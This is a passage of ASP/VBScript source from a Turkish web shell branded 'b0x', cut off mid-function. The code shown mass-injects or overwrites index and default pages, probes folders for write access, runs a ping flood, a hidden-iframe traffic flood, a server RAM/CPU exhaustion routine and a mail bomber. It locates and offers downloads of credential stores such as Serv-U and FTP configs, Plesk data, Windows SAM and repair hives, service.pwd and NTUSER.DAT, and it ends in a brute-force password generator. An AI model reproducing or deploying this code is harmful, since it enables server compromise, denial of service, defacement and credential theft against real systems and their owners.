Call MassCreater(fastb0x&"\index.php",ej)
Call MassCreater(fastb0x&"\default.html",ej)
Call MassCreater(fastb0x&"\default.htm",ej)
Call MassCreater(fastb0x&"\default.asp",ej)
Call MassCreater(fastb0x&"\default.cfm",ej)
Call MassCreater(fastb0x&"\default.php",ej)
end if
else
if hash9 = "copy" then
MassCopier(fastb0x&"\"&inject1)
else
Call MassCreater(fastb0x&"\"&inject1,ej)
end if
end if
a = Replace(FilePath&"?Path="&fastb0x&"&Time="&time,"\","/")
If Err.Number = 0 Then
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastb0x&" </a><font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"
else
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastb0x&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"
end if
Err.Number = 0
Response.Flush
if islem = "brute" then
Call MassAttack(f1.path&"\",ej,svk)
end if
Next
end sub
Sub tester(yer)
on error resume next
Set f = b0x.GetFolder(yer)
Set fc = f.SubFolders
For Each f1 In fc
a = Replace(FilePath&"?Path="&f1.path&"&Time="&time,"\","/")
response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&f1.path&" </a> "
Response.Flush
Err.Number = 0
on error resume next
Set f = b0x.GetFolder(f1.path)
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Reading :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write " <b><font color=#FAFEDE>Reading :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
set f = nothing
Err.Number = 0
Response.Flush
on error resume next
Set MyFile = b0x.CreateTextFile(f1.path & "test.b0x", True)
MyFile.write " b0x Was Here "
set MyFile = Nothing
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Writing :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write " <b><font color=#FAFEDE>Writing :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
set f = nothing
Err.Number = 0
Response.Flush
on error resume next
b0x.DeleteFile f1.path & "test.b0x",true
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Deleting :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write " <b><font color=#FAFEDE>Deleting :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
set f = nothing
Err.Number = 0
Response.Flush
response.write "</td></tr></table>"
Response.Flush
Call tester(f1.path)
Next
end sub
Sub arama(yer)
on error resume next
Set f = b0x.GetFolder(yer)
Set fc = f.SubFolders
For Each f1 In fc
Set f2 = b0x.GetFolder(f1.path)
Set fc2 = f2.Files
For Each f12 In fc2
if InStr(Ucase(f12.name),Ucase(hacked)) > 0 then
downStr = "<table align=""center""><tr><td align=""center"" class=""kbrtm""><font class=""k2""><a href='"&FilePath&"?mode=6&file="&f12.path&"&Path="&Path&"&Time="&time&"'> ? </a></font>"
if Ucase(hacked)="MDB" then
Response.Write downStr&"<font class=""k1"" ><a href='"&FilePath&"?mode=5&Path="&Path&"&del="&f12.path&"&Time="&time&"'> û </a></font> - <a href='"&dosyapath&"?mode=13&file="&f12.path&"&Path="&Path&"&Time="&time&"'>"&f12.path&" ["&f12.size&"]"&"</a></b><br></td></tr></table>"
i=i+1
else
Response.Write downStr&"<font class=""k1""><a href='"&FilePath&"?mode=5&Path="&Path&"&del="&f12.path&"&Time="&time&"'> û </a><a href='"&FilePath&"?mode=10&file="&f12.path&"&Path="&Path&"&Time="&time&"'> ! </a></font> - <a href='"&dosyapath&"?mode=9&file="&f12.path&"&Path="&Path&"&Time="&time&"'>"&f12.path&" [<font color=yellow>"&f12.size&"</font>]"&"</a></b><br></td></tr></table>"
i=i+1
end if
end if
Response.Flush
next
set f2 = nothing
set fc2 = nothing
Call arama(f1.path)
next
set f = nothing
set fc = nothing
end sub
Sub Ping_Bomb_b0x(b0xsite,b0xpings,b0xtimeout,b0xbyte)
'/// by b0x. ?zel modüller ekledim =). Ne Mutlu TURKUM D?YENE.
noattack = 1
bonus = 0
If b0xpings = "" Then b0xpings = 4
If b0xpings = 0 Then b0xpings = 4
If b0xtimeout = "" Then b0xtimeout = 750
If InStr(b0xsite,"savsak") > 0 or InStr(b0xsite,"yagmurlu") or InStr(b0xsite,"gov.tr") > 0 then noattack = 0
If InStr(b0xsite,"cyber") > 0 or InStr(b0xsite,"tahri") > 0 or InStr(b0xsite,"hack") > 0 or InStr(b0xsite,"team") > 0 then bonus = 1
response.write "<textarea style='width:100%;height:350;' >"
if noattack = 1 then
if bonus = 1 then
b0xpings = b0xpings * 20
response.write "Ekstra *20 Bonus kazand?n. "
end if
Set Sh = CreateObject("WScript.Shell")
if b0xbyte = "" then
Set ExCmd = Sh.Exec("ping -n " & b0xpings _
& " -w " & b0xtimeout & " " & b0xsite)
else
Set ExCmd = Sh.Exec("ping -n " & b0xpings _
& " -w " & b0xtimeout & " " & b0xsite & " -l " & b0xbyte)
end if
depola = ExCmd.StdOut.ReadAll
response.write depola
Select Case InStr(ExCmd.StdOut.Readall,"TTL=")
Case 0 IsConnectable = False
Case Else IsConnectable = True
End Select
else
response.write "Tasvip Etmedi?imiz Bir siteye Sald?r? yap?yorsun. Tekrarlama K?tü olur senin için. CIZZZ =) euheu by b0x "
response.write "Bu b0x sahibine, GOv.TR ve Com.TR sitelere kar?? Koruma gerçekle?tirildi. TURK TURK ü VURMAZ.. Kalle?lik yapma by b0x "
response.cookies("b0x") = "1"
response.cookies("b0x").expires = now + 365
count=0
end if
response.write "</textarea>"
End Sub
Sub Somurgen(filex,urlx)
for i=0 to CInt(filex)
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"&i&". Robot Ba?land?..</td></tr></table>"
response.Write "<iframe style='width:0; height:0' src='"&urlx&"'></iframe>"
next
End Sub
Sub Ram_Cpu
on error resume next
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><b> RAM & CPU FUcker for SERVER 0 </b></td></tr></table>"
response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> ZARAR verme MEkanizmas? Devrede... </td></tr></table>"
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> Durdurmak için Pencereyi kapat. Her 2 Saniyede bir 3 program aç?l?yor...</td></tr></table>"
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> <b>by b0x</b></td></tr></table>"
response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=1'></iframe>"
response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=2'></iframe>"
response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=3'></iframe>"
response.write "<META http-equiv=refresh content=2;URL='"&FilePath&"?mode=31&file=1'>"
response.flush
end Sub
function TextYarat(intLen)
str=""
Randomize
for i=1 to intLen
str=str & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
next
TextYarat=str
end function
function MailSec()
dim strNewText,i
str=""
Randomize
mail = mail_array(round(rnd()*4))
uzanti = uzanti_array(round(rnd()*6))
str = "@"& mail &"."& uzanti
MailSec = str
end function
function MailKorumasi(mailx)
MailKorumasi = 0
for i=0 to 9
If Instr(UCASE(mailx), yasak_array(i)) Then
MailKorumasi = 1
end if
next
end function
Function MailYarat()
MailYarat = TextYarat(8) & MailSec()
end function
Function TextYarat2()
TextYarat2 = TextYarat(200)
end function
Function BaslikYarat()
BaslikYarat = TextYarat(10)
end function
Sub MailBomber_by_b0x(alicix)
response.cookies("bilesen") = "1"
on error resume next
Set mailObj = Server.CreateObject("CDONTS.NewMail")
mailObj.From = MailYarat()
mailObj.To = alicix
mailObj.Subject = BaslikYarat()
mailObj.Body = TextYarat2()
mailObj.Send
Set mailObj = Nothing
if err <> 0 then
on error resume next
Set mailObj = Server.CreateObject("CDO.Message")
mailObj.From = MailYarat()
mailObj.To = alicix
mailObj.Subject = BaslikYarat()
mailObj.TextBody = TextYarat2()
mailObj.Send
Set mailObj = Nothing
if err <> 0 then
response.cookies("bilesen") = "0"
end if
end if
End Sub
Sub yazorta(yazx)
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"
End Sub
Sub yazsol(yazx)
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"
End Sub
Sub yazortaa(yazx)
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"
End Sub
Sub yazsoll(yazx)
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"
End Sub
Function OS()
on error resume next
strComputer = "."
Set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMI.ExecQuery("Select * from Win32_OperatingSystem",,48)
For Each objItem in colItems
VerBig = Left(objItem.Version,3)
Next
Select Case VerBig
Case "5.0" OSystem = "W2K"
Case "5.1" OSystem = "XP"
Case "5.2" OSystem = "Windows 2003"
Case "4.0" OSystem = "NT 4.0**"
Case Else OSystem = "Unknown - probably Win 9x"
End Select
OS = OSystem
End Function
Sub FolderExistx(yer)
if b0x.FolderExists(yer) then
yazorta("<font class=""k1""><a title="" Dizini Copy/Move File?? "" href='"&FilePath&"?mode=2&Path="&yer&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Dizini Sil "" href='"&FilePath&"?mode=4&Path="&yer&"&del="&yer&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?Path="&yer&"&Time="&time&"'> "&yer&"</a></b>")
end if
End Sub
Sub b0xServuRemote()
j=0
servu = array("C:\Program Files\base.ini","C:\base.ini","C:\Program Files\Serv-U\base.ini","C:\Program Files\Serv-U\ServUAdmin.ini","C:\Program Files\Serv-U\SERV-U.ini","C:\Program Files\Serv-U\ServUDaemon.ini","C:\Program Files\SERV-U.ini","C:\SERV-U.ini","C:\Program Files\ServUDaemon.ini","C:\ServUDaemon.ini","C:\Program Files\WS_FTP.ini","C:\WS_FTP.ini","C:\Program Files\WS_FTP\WS_FTP.ini","C:/Program Files/Gene6 FTP Server/RemoteAdmin/remote.ini","C:/users.txt","D:/users.txt","E:/users.txt")
for i=0 to 16
if b0x.FileExists(servu(i)) then
downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&servu(i)&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Copy/Move File?? "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" ?çini Gomek için T?kla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&Path="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyay? Editlemek için T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Remote olarak Sonuç bulunamad?. Geli?mi? aramay? seçiniz. <font face=Wingdings size=5>N</font> </font>")
end if
servufolder = array("C:\Program Files\Serv-U","C:/Program Files/Gene6 FTP Server/RemoteAdmin","C:/Program Files/Gene6 FTP Server/Accounts/Helm FTP Users/users")
for i=0 to 2
FolderExistx(servufolder(i))
next
End Sub
Sub b0xPleskRemote()
j=0
plesk = array("c:/Program Files/SWsoft/Plesk/MySQL/Data/mysql","c:/Program Files/SWsoft/Plesk","c:/Program Files/SWsoft/Plesk/MySQL/Data/psa","c:/Program Files/SWsoft/Plesk/Databases/MySQL/Data/mysql","c:\Program Files\swsoft\autsav.sav")
for i=0 to 3
if b0x.FolderExists(plesk(i)) then
yazorta("<font class=""k1""><a title="" Dizini Copy/Move File?? "" href='"&FilePath&"?mode=2&Path="&plesk(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Dizini Sil "" href='"&FilePath&"?mode=4&Path="&plesk(i)&"&del="&plesk(i)&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?Path="&plesk(i)&"&Time="&time&"'>"&plesk(i)&"</a></b>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&plesk(0)&" ve "&plesk(1)&" dizinleri bulunamad?. <font face=Wingdings size=5>N</font> </font>")
end if
if b0x.FileExists(plesk(4)) then
downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&servu(i)&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" ?çini Gomek için T?kla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&Path="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyay? Editlemek için T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font>")
else
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Plesk'in Autsav.sav Dosyas? bulunamad?. <font face=Wingdings size=5>N</font> </font>")
end if
End Sub
Sub b0xSam()
Err.Number=0
on error resume next
Set MyFile = b0x.CreateTextFile("C:config\test.b0x", True)
MyFile.write " b0x Was Here... =) "
set MyFile = Nothing
if Err.Number <> 0 then
response.write "<center> <b><font color=#FBE1D7>Writing :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write "<center> <b><font color=#FAFEDE>Writing :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
Err.Number=0
on error resume next
b0x.DeleteFile "C:config\test.b0x",true
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Deleting :</font></b> <font color=#FE7A84 class=""k1"">û</font> </center>"
else
response.write " <b><font color=#FAFEDE>Deleting :</font></b> <font color=#C6FCBE class=""k1"">ü</font> </center>"
end if
on error resume next
url = "C:config\"
Set f = b0x.GetFolder(url)
if err <> 0 then
url = "C:\WINDOWS\system32\config\"
Set f = b0x.GetFolder(url)
end if
Set fc = f.Files
For Each f1 In fc
downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&url&"&del="&url&""&f1.name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&Path="&url&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" ?çini Gomek için T?kla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&Path="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyay? Editlemek için T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&Path="&url&"'>!</a>"&downStr&"</font>")
Next
end Sub
Sub b0xVti_Pvt()
j=0
local = request.servervariables("APPL_PHYSICAL_PATH")
vti = array(""&local&"\_vti_pvt\access.cnf",""&local&"\..\_vti_pvt\access.cnf",""&local&"\..\..\_vti_pvt\access.cnf",""&local&"\..\..\..\_vti_pvt\access.cnf",""&local&"\_vti_pvt\postinfo.html",""&local&"\..\_vti_pvt\postinfo.html",""&local&"\..\..\_vti_pvt\postinfo.html",""&local&"\..\..\..\_vti_pvt\postinfo.html",""&local&"\vti_pvt/service.pwd",""&local&"\..\vti_pvt/service.pwd",""&local&"\..\..\vti_pvt/service.pwd",""&local&"\..\..\..\vti_pvt/service.pwd")
for i=0 to 11
if b0x.FileExists(vti(i)) then
downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&vti(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&vti(i)&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&vti(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&vti(i)&"&islem="&vti(i)&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" ?çini Gomek için T?kla "" href='"&FilePath&"?mode=9&file="&vti(i)&"&Path="&FolderPath&"&Time="&time&"'>"&vti(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyay? Editlemek için T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&vti(i)&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonuç bulunamad?. Daha geni? Arama yap?n by b0x <font face=Wingdings size=5>N</font> </font>")
end if
end sub
Sub b0xNTUser(oturum)
j=0
ntuser = array("c:\documents and settings\"&oturum&"\NTUSER.DAT","c:\documents and settings\Administrator\NTUSER.DAT","c:\documents and settings\"&oturum&"\ntuser.dat.log","c:\documents and settings\Administrator\ntuser.dat.log","c:\documents and settings\"&oturum&"\ntuser.ini","c:\documents and settings\Administrator\ntuser.ini")
for i=0 to 5
if b0x.FileExists(ntuser(i)) then
downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&FolderPath&"&del="&FolderPath&"\"&ntuser(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&ntuser(i)&"&Path="&FolderPath&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&ntuser(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&ntuser(i)&"&islem="&ntuser(i)&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" ?çini Gomek için T?kla "" href='"&FilePath&"?mode=9&file="&ntuser(i)&"&Path="&FolderPath&"&Time="&time&"'>"&ntuser(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyay? Editlemek için T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&ntuser(i)&"&Time="&time&"&Path="&FolderPath&"'>!</a>"&downStr&"</font>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonuç bulunamad?. Daha geni? Arama yap?n by b0x <font face=Wingdings size=5>N</font> </font>")
end if
end sub
Sub b0xRepair()
Err.Number=0
on error resume next
Set MyFile = b0x.CreateTextFile("c:..\repair\test.b0x", True)
MyFile.write " b0x Was Here... =) "
set MyFile = Nothing
if Err.Number <> 0 then
response.write "<center> <b><font color=#FBE1D7>Writing :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write "<center> <b><font color=#FAFEDE>Writing :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
Err.Number=0
on error resume next
b0x.DeleteFile "c:..\repair\test.b0x",true
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Deleting :</font></b> <font color=#FE7A84 class=""k1"">û</font> </center>"
else
response.write " <b><font color=#FAFEDE>Deleting :</font></b> <font color=#C6FCBE class=""k1"">ü</font> </center>"
end if
on error resume next
url = "c:..\repair\"
Set f = b0x.GetFolder(url)
if err <> 0 then
url = "C:\WINDOWS\repair\"
Set f = b0x.GetFolder(url)
end if
Set fc = f.Files
For Each f1 In fc
downStr = "<a title=""Dosyay? Sil"" href='"&FilePath&"?mode=5&Path="&url&"&del="&url&""&f1.name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download File "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&Path="&url&"&Time="&time&"'>?</a></font><font face=wingdings><a title="" Dosyay? Copy & Ta?? "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format De?i?tir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&Path="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" ?çini Gomek için T?kla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&Path="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyay? Editlemek için T?kla by b0x :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&Path="&url&"'>!</a>"&downStr&"</font>")
Next
end Sub
Function kodolustur(aralik)
' belirtitiim aral?kda kod olu?tuuyorurum. 01#01#01#01# ba?lang?ç iiçin by b0x
dim coding
coding = ""
for i=1 to CInt(aralik)
coding = coding + "01#"
next
kodolustur = coding
End Function
Function diziolustur()
' Seçilen Charset leri burda birle?tiriyorum by b0x
Dim dizi
dizi=""
if not k1 = "" then dizi = dizi & karakter1
if not k2 = "" then dizi = dizi & karakter2
if not k3 = "" then dizi = dizi & karakter3
if not k4 = "" then dizi = dizi & karakter4
diziolustur = dizi
End Function
Function Sifreyarat(codex,aralik,dizix)
' Stirng kodunu sa?dan ç?zümleyerek ?ifre yarat?yor by b0x
dim hash
dim sifre
hash=""
sifre=""
i=CInt(aralik)
Do While i>0
hash = CInt(Mid(codex,((i-1)*3)+1,2)) ' Sa?dan say?lar? al?yor.
sifre = Mid(dizix,hash,1) & sifre
i=i-1
Loop
Sifreyarat = sifre
End Function
Function SonrakiAdim(codex,aralik,dizix)
' sonraki ad?ma haz?rl?k coded Developed By TurkisH-RuleZ
Dim hash
hash = ""
increment=0
goup=0
hashing = ""
i=CInt(aralik)
Do While i>0
hash = CInt(Mid(codex,((i-1)*3)+1,2)) ' Sa?dan say?lar? al?yor.
' Carry out ? di?eirne giri? yap increment the next one
if hash => Len(dizix) then
increment = 1
hash = 1
else if increment = 1 then
hash = hash+1
increment = 0
end if
end if
' e?er ara1 hanelki ?ifreleme bitti ise di?eirne ?kams? gerek ara1++